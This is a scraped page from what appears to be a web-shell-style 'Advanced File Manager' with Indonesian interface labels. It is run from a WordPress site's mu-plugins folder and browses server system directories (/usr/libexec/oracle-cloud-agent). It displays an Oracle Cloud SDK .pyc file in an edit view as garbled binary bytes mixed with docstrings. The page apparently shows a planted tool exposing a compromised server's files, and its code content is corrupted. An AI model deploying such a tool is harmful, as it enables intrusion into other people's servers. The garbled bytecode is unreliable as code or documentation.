📂 Advanced File Manager
Multi-Root Navigation System
⚡ Quick Jump
Server (/)
Home (/home)
Var_www (/var/www)
Current (/home4/shelley/public_html/shelleycutler.com/wp-content/mu-plugins)
📍 Go
⬆ Ke Atas
🏠 Root Server
🏠 Root App
🔄 Refresh
📀 /
›
usr
›
libexec
›
oracle-cloud-agent
›
plugins
›
osms
›
oci
›
data_integration
›
📁 models
📍
Lokasi:
/usr/libexec/oracle-cloud-agent/plugins/osms/oci/data_integration/models
💾
Free:
45.8 GB
⚠️ Direktori ini
tidak writable
.
✏️ Mengedit: create_user_defined_function_validation_details.pyc
a N��f�= � @ s8 d dl mZmZmZ d dlmZ eG dd� de��ZdS )� )�formatted_flat_dict� NONE_SENTINEL�#value_allowed_none_or_none_sentinel)�init_model_state_from_kwargsc @ s� e Zd ZdZdZdd� Zedd� �Zejdd� �Zedd � �Z e jd d � �Z edd� �Z e jd d� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Z e jdd� �Z edd� �Zejdd� �Zedd� �Zejdd� �Zedd� �Zejdd� �Zed d!� �Zejd"d!� �Zed#d$� �Zejd%d$� �Zed&d'� �Zejd(d'� �Zed)d*� �Zejd+d*� �Zd,d-� Zd.d/� Zd0d1� Zd2S )3�*CreateUserDefinedFunctionValidationDetailszR The properties used in create UserDefinedFunction validation operations. �DIS_USER_DEFINED_FUNCTIONc K s� dddddddddddddd� | _ d d ddd ddddddddd� | _d| _d| _d| _d| _d| _d| _d| _d| _ d| _ d| _d| _d| _ d| _dS )aO Initializes a new CreateUserDefinedFunctionValidationDetails object with values from keyword arguments. The following keyword arguments are supported (corresponding to the getters/setters of this class): :param key: The value to assign to the key property of this CreateUserDefinedFunctionValidationDetails. :type key: str :param model_type: The value to assign to the model_type property of this CreateUserDefinedFunctionValidationDetails. Allowed values for this property are: "DIS_USER_DEFINED_FUNCTION" :type model_type: str :param model_version: The value to assign to the model_version property of this CreateUserDefinedFunctionValidationDetails. :type model_version: str :param parent_ref: The value to assign to the parent_ref property of this CreateUserDefinedFunctionValidationDetails. :type parent_ref: oci.data_integration.models.ParentReference :param name: The value to assign to the name property of this CreateUserDefinedFunctionValidationDetails. :type name: str :param identifier: The value to assign to the identifier property of this CreateUserDefinedFunctionValidationDetails. :type identifier: str :param object_version: The value to assign to the object_version property of this CreateUserDefinedFunctionValidationDetails. :type object_version: int :param signatures: The value to assign to the signatures property of this CreateUserDefinedFunctionValidationDetails. :type signatures: list[oci.data_integration.models.FunctionSignature] :param expr: The value to assign to the expr property of this CreateUserDefinedFunctionValidationDetails. :type expr: oci.data_integration.models.Expression :param description: The value to assign to the description property of this CreateUserDefinedFunctionValidationDetails. :type description: str :param object_status: The value to assign to the object_status property of this CreateUserDefinedFunctionValidationDetails. :type object_status: int :param metadata: The value to assign to the metadata property of this CreateUserDefinedFunctionValidationDetails. :type metadata: oci.data_integration.models.ObjectMetadata :param key_map: The value to assign to the key_map property of this CreateUserDefinedFunctionValidationDetails. :type key_map: dict(str, str) �str�ParentReference�intzlist[FunctionSignature]� Expression�ObjectMetadatazdict(str, str)) �key� model_type� model_version� parent_ref�name� identifier�object_version� signatures�expr�description� object_status�metadata�key_mapr � modelType�modelVersion� parentRefr r � objectVersionr r r �objectStatusr �keyMapN)� swagger_types� attribute_map�_key�_model_type�_model_version�_parent_ref�_name�_identifier�_object_version�_signatures�_expr�_description�_object_status� _metadata�_key_map)�self�kwargs� r1 ��/sparta/input/_build_configuration/image_build+validate/lib/bmcenv/lib64/python3.9/site-packages/oci/data_integration/models/create_user_defined_function_validation_details.py�__init__ sR <��z3CreateUserDefinedFunctionValidationDetails.__init__c C s | j S )ar Gets the key of this CreateUserDefinedFunctionValidationDetails. Generated key that can be used in API calls to identify user defined function. On scenarios where reference to the user defined function is needed, a value can be passed in create. :return: The key of this CreateUserDefinedFunctionValidationDetails. :rtype: str �r"